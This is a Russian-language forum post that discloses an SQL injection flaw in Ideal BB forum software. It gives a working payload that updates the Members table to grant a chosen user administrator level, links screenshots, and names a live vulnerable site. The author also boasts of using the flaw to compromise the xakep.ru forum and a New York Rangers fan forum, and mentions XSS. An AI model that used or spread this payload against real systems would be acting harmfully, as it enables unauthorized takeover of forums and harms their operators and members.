![]() |
Уязвимость в Ideal BB
И так данная уязвимость была найдена у меня когда разбирал архив на диске, уязвимость заключается в том что отцувствует фильтрация в сообщениях пользователя благодоря которой мы можем выполнить произвольный скюл запрос ( что мы делаем в приведённом примере, а именно становимся администратором)
сам запрос: 0';update [dbo].[Members] set [dbo].[Members].[M_Level]=3 where [dbo].[Members].[Member_ID]=3407-- где: [M_Level]=3 -даёт права админа [Member_ID]=3407 - ваш id. пример: до запроса: http://img183.imageshack.us/img183/6...5871wo0.th.jpg сам запрос: http://img183.imageshack.us/img183/7...3179sk3.th.jpg после: http://img183.imageshack.us/img183/1...3714ej3.th.jpg пример уязвимого форума: http://www.lucianopires.com.br/idealbb/default.asp ----------------------------- при помощи данной уязвимости когда то был взломан форум xakep.ru и мной форум хоккейной команды: ньюёрские ренжеры так же на форуме присутствуют и XSS PHP код:
|
| Время: 20:07 |